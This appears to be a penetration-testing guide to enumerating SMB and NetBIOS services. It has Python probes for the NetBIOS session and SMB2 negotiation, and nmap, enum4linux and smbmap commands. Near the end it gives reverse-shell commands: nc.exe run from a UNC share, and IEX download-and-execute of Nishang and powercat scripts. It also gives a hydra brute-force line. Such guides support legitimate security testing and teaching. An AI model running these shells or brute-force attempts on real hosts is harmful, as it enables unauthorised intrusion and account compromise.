
SMB (139,445)

SMB (Server Message Block) is a network protocol that provides file sharing, network browsing, printing services and inter-process communication (named pipes) over a network. CIFS (Common Internet File System) is Microsoft's name for the SMB1 dialect; the two terms are often used interchangeably, but current Windows versions speak SMB2/3 and ship with SMBv1 disabled by default.

Port 139: NetBIOS stands for Network Basic Input Output System. It is a session-layer API and protocol that lets applications, PCs and desktops on a local area network (LAN) locate each other and exchange data. Applications on a NetBIOS network locate and identify each other by NetBIOS name. A NetBIOS name is 16 bytes long: up to 15 characters (space padded) plus a one-byte suffix that identifies the service (0x00 workstation, 0x20 file server, 0x1C domain controllers), and on Windows it is normally derived from the computer name. Two applications start a NetBIOS session when the client sends a session request that "calls" the server's name over TCP port 139; the SMB traffic is then carried inside that session, which is why 139 is described as "NBT over IP". (Adapted from the Hacking Articles guide listed in the references below.)

Port 445: while port 139 carries SMB inside a NetBIOS session (NBT), port 445 is "SMB over IP", i.e. SMB directly over TCP with only a 4-byte length header and no NetBIOS session setup. SMB (Server Message Block) is an application-layer protocol used primarily to offer shared access to files, printers, serial ports and other forms of communication (named pipes, RPC) between nodes on a network. Modern Windows hosts listen on both ports; 445 is the one almost every tool uses by default.
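The practical difference between the two ports is the transport: on 139 a NetBIOS session request using the encoded 16-byte name described above must succeed before a single SMB byte is sent, on 445 it is skipped. The following Python is an added example (it is not from the original page or from any of the tools it lists) that encodes a NetBIOS name exactly as the paragraph describes, sends the RFC 1002 session request to TCP/139 and decodes the positive or negative reply. The probe() helper, the calling name PENTEST and the use of the generic called name *SMBSERVER are assumptions made for illustration.

```python
"""NetBIOS session request to TCP/139 (RFC 1001/1002).

Added example, not from the original page: shows the 16-byte NetBIOS name
format and the session handshake every SMB-over-139 connection starts with.
"""
import socket
import struct

SESSION_REQUEST = 0x81      # RFC 1002 session packet types
POSITIVE_RESPONSE = 0x82
NEGATIVE_RESPONSE = 0x83

# RFC 1002 4.3.4: error byte carried in a negative session response
NEGATIVE_CODES = {
    0x80: "Not listening on called name",
    0x81: "Not listening for calling name",
    0x82: "Called name not present",
    0x83: "Called name present, but insufficient resources",
    0x8F: "Unspecified error",
}


def netbios_name(name: str, suffix: int) -> bytes:
    """16-byte NetBIOS name: at most 15 characters, space padded, plus suffix."""
    if len(name) > 15:
        raise ValueError("NetBIOS names hold at most 15 characters plus a suffix byte")
    return name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])


def encode_name(name: str, suffix: int) -> bytes:
    """RFC 1001 first-level encoding: each nibble becomes 'A' + nibble, giving 32
    characters, framed as a DNS-style label (length 0x20) with an empty scope."""
    half_ascii = bytearray()
    for b in netbios_name(name, suffix):
        half_ascii += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return b"\x20" + bytes(half_ascii) + b"\x00"


def session_request(called: str, calling: str,
                    called_suffix: int = 0x20, calling_suffix: int = 0x00) -> bytes:
    """Type 0x81 packet: type, flags, 16-bit length, called name, calling name.
    Suffix 0x20 is the File Server service, 0x00 the Workstation service."""
    body = encode_name(called, called_suffix) + encode_name(calling, calling_suffix)
    return struct.pack(">BBH", SESSION_REQUEST, 0, len(body)) + body


def parse_session_response(data: bytes) -> dict:
    """Classify the server's reply; only the type byte (and error byte) matter."""
    if len(data) < 4:
        raise ValueError("short NBT packet")
    ptype = data[0]
    if ptype == POSITIVE_RESPONSE:
        return {"ok": True, "code": None, "reason": "Positive session response"}
    if ptype == NEGATIVE_RESPONSE:
        code = data[4] if len(data) > 4 else None
        return {"ok": False, "code": code,
                "reason": NEGATIVE_CODES.get(code, "Unknown error code")}
    return {"ok": False, "code": ptype, "reason": "Unexpected packet type 0x%02x" % ptype}


def probe(host: str, called: str = "*SMBSERVER", calling: str = "PENTEST",
          timeout: float = 5.0) -> dict:
    """Assumed helper: open TCP/139 and ask for a session with the called name.
    *SMBSERVER is the generic name Samba and most Windows versions answer to."""
    with socket.create_connection((host, 139), timeout=timeout) as s:
        s.sendall(session_request(called, calling))
        return parse_session_response(s.recv(16))


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

Run it as python3 nbt_session.py <target>. A 0x83 reply with code 0x82 (called name not present) means the host insists on its real NetBIOS name; take that from nmblookup -A <target> or nbtscan and pass it as called=. On 445 none of this applies: the transport there is a 4-byte header (type 0 plus a 24-bit length) followed directly by the SMB message.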

Methodology

Check first for the well-known unauthenticated RCE bugs: SMBGhost (CVE-2020-0796, SMBv3.1.1 compression on Windows 10 1903/1909), NetAPI (MS08-067, CVE-2008-4250) and EternalBlue (MS17-010, CVE-2017-0144, SMBv1). The nmap scripts smb-vuln-ms08-067 and smb-vuln-ms17-010 below cover the last two; SMBGhost needs a dedicated checker.

The SMB protocol lets you access resources on a server, so start by listing the shares it exposes. smbclient takes the password after a % in the -U argument (-P is not the password option; it means "use the stored machine account password"); -N attempts a null session instead:

smbclient -L //target-ip -U 'user%password'

Identify the SMB version and dialects with nmap. smb-protocols lists the dialects the server accepts: a host that still answers NT LM 0.12 has SMBv1 enabled. Run smb2-security-mode alongside it to learn whether message signing is required, which is the check that decides whether NTLM relay against the host is viable:

nmap --script smb-protocols -p 445 <target-ip>

Enumerate domains, groups, processes, services, sessions, shares and users. Most smb-enum-* scripts only return data with a valid account or against a host that allows null sessions; pass credentials with --script-args smbusername=<user>,smbpassword=<pass>:

nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-services.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse -p445 $IP

Run the vulnerability checks. Several of these are intrusive (smb-vuln-regsvc-dos and smb-vuln-ms10-054 can crash the target service), so drop them outside a lab:

nmap --script smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse,smb-vuln-webexec.nse -p445 $IP

Samba only: check for CVE-2017-7494 (SambaCry) from the version banner rather than by loading a module:

nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 $IP
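The version scan above reports the negotiated dialect and the signing mode; the following Python is an added example (not from the original page and not nmap's code) that sends one SMB2 NEGOTIATE to port 445 and decodes the DialectRevision and SecurityMode fields, so the reader sees exactly what "SMB 2.1, message signing enabled but not required" is derived from. The probe() helper and the constructed SAMPLE_RESPONSE are assumptions made for illustration; the wire layouts follow MS-SMB2.

```python
"""Direct SMB2 NEGOTIATE over TCP/445: dialect and signing policy.

Added example, not from the original page or from nmap; it reproduces what
smb-protocols / smb2-security-mode report, field by field.
"""
import socket
import struct
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SIGNING_ENABLED = 0x0001   # SecurityMode flags (MS-SMB2 2.2.3 / 2.2.4)
SIGNING_REQUIRED = 0x0002
DIALECT_NAMES = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
                 0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1", 0x02FF: "SMB 2.??? (wildcard)"}


def smb2_header(command: int, message_id: int = 0) -> bytes:
    """64-byte SMB2 header (MS-SMB2 2.2.1): no session, no signature yet."""
    return struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, command, 0, 0, 0,
                       message_id, 0, 0, 0, b"\x00" * 16)


def negotiate_request(dialects=(0x0202, 0x0210, 0x0300, 0x0302)) -> bytes:
    """NEGOTIATE request (MS-SMB2 2.2.3). 3.1.1 is deliberately left out: it
    requires negotiate contexts, which would double the size of this example."""
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED, 0, 0,
                       uuid.uuid4().bytes, 0)
    body += b"".join(struct.pack("<H", d) for d in dialects)
    pkt = smb2_header(SMB2_NEGOTIATE) + body
    # direct TCP transport (port 445): 4-byte header, type 0 + 24-bit length
    return struct.pack(">I", len(pkt)) + pkt


def parse_negotiate_response(pkt: bytes) -> dict:
    """Pull out the fields that decide the next step of the engagement."""
    if pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 reply (0xFF 'SMB' would be an SMB1 server)")
    (status,) = struct.unpack_from("<I", pkt, 8)
    if status != 0:
        raise ValueError("NEGOTIATE failed, NTSTATUS 0x%08x" % status)
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize %d" % struct_size)
    return {
        "dialect": dialect,
        "dialect_name": DIALECT_NAMES.get(dialect, "unknown 0x%04x" % dialect),
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
        # signing not required: NTLM relay to this host is worth trying
        "relay_candidate": not (security_mode & SIGNING_REQUIRED),
    }


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed during NEGOTIATE")
        buf += chunk
    return buf


def probe(host: str, port: int = 445, timeout: float = 5.0) -> dict:
    """Assumed helper: send one NEGOTIATE and decode the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(negotiate_request())
        (length,) = struct.unpack(">I", recv_exact(s, 4))
        return parse_negotiate_response(recv_exact(s, length & 0x00FFFFFF))


# Constructed sample reply (not a capture): dialect 2.1, signing enabled but
# not required, the default SecurityMode of a Windows host that is not a DC.
SAMPLE_RESPONSE = (
    b"\xfeSMB" + b"\x40\x00" + b"\x00\x00" + b"\x00\x00\x00\x00"          # magic, size, charge, status
    + b"\x00\x00" + b"\x01\x00" + b"\x01\x00\x00\x00" + b"\x00" * 4       # cmd, credits, flags, next
    + b"\x00" * 8 + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 8 + b"\x00" * 16  # ids, signature
    + b"\x41\x00" + b"\x01\x00" + b"\x10\x02" + b"\x00\x00"               # size 65, mode, 0x0210, ctx
    + b"\x00" * 16 + b"\x00" * 41                                         # guid, caps..., buffer
)


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else parse_negotiate_response(SAMPLE_RESPONSE))
```

python3 smb2_negotiate.py <target> prints the decoded dictionary; without an argument it decodes the constructed sample. The script says nothing about SMBv1: a server that only speaks SMBv1 will drop or reject the SMB2 request, and testing that dialect needs the 0xFF "SMB" NEGOTIATE that nmap's smb-protocols also sends.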

OS Discovery. smb-os-discovery reads the OS version, computer name, domain and workgroup from the session setup reply; it needs no credentials and no unsafe=1, but it relies on the SMBv1 session setup, so hosts with SMBv1 disabled usually return nothing:

nmap -p 139,445 --script smb-os-discovery $IP

Enumerate SMB with Enum4Linux

Enumerate with enum4linux

enum4linux-ng target-ip

Do all simple enumeration (-a) as a null session, i.e. with an empty username and password:

enum4linux -a -u "" -p "" $IP

Log in as a specific user, here the built-in guest account with an empty password:

enum4linux -a -u "guest" -p "" $IP

enum4linux-ng -A runs the full simple enumeration: users, groups, shares (with an access check on each), password policy, OS information and the NetBIOS name lookup:

enum4linux-ng target-ip -A

Enumerate shares with smbmap, which shows the permissions on each share (smbclient -L does not). -u null with an empty password tests a null session, -P selects the port, and -x runs a command on the host, which only works with an account that is a local administrator on the target:

smbmap -H target-ip
smbmap -u "user" -p "pass" -H $IP
smbmap -H $IP -u null
smbmap -H $IP -P 139 2>&1
smbmap -H $IP -P 445 2>&1
smbmap -u null -p "" -H $IP -P 139 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H $IP -P 445 -x "ipconfig /all" 2>&1

We can execute a binary directly from a share we control: host a folder with impacket's smbserver (use -smb2support, since current Windows versions refuse SMBv1) and launch the binary through its UNC path from the target, for example from a command-injection or webshell foothold:

\\<ip>\smbFolder\nc.exe -nv <ip> <port> -e powershell.exe

Windows may refuse an unauthenticated connection to the share: since Windows 10 1709 and Server 2019 insecure guest logons are disabled by default (the AllowInsecureGuestAuth policy), so the UNC call fails before nc.exe ever runs. In that case, get a reverse shell through PowerShell instead, serving the script over HTTP.

Using Invoke-PowerShellTcp (Nishang)

IEX(New-Object Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port>

Using PowerCat

IEX (New-Object System.Net.Webclient).DownloadString('http://<ip>/powercat.ps1'); powercat -c <ip> -p <port> -e cmd.exe

Bruteforcing

Colon-separated login:password pairs. hydra -C tries each pair exactly as listed, which suits default-credential lists. Check the lockout threshold first (enum4linux -P prints the password policy) so the attempt does not lock accounts out:

hydra -C SecLists/Passwords/Default-Credentials/smb-betterdefaultpasslist.txt $IP smb

References

Hacking Articles, A little guide to SMB enumeration: https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
HackTricks, Pentesting SMB: https://hacktricks.boitatech.com.br/pentesting/pentesting-smb
Hackviser, SMB pentesting: https://hackviser.com/tactics/pentesting/services/smb
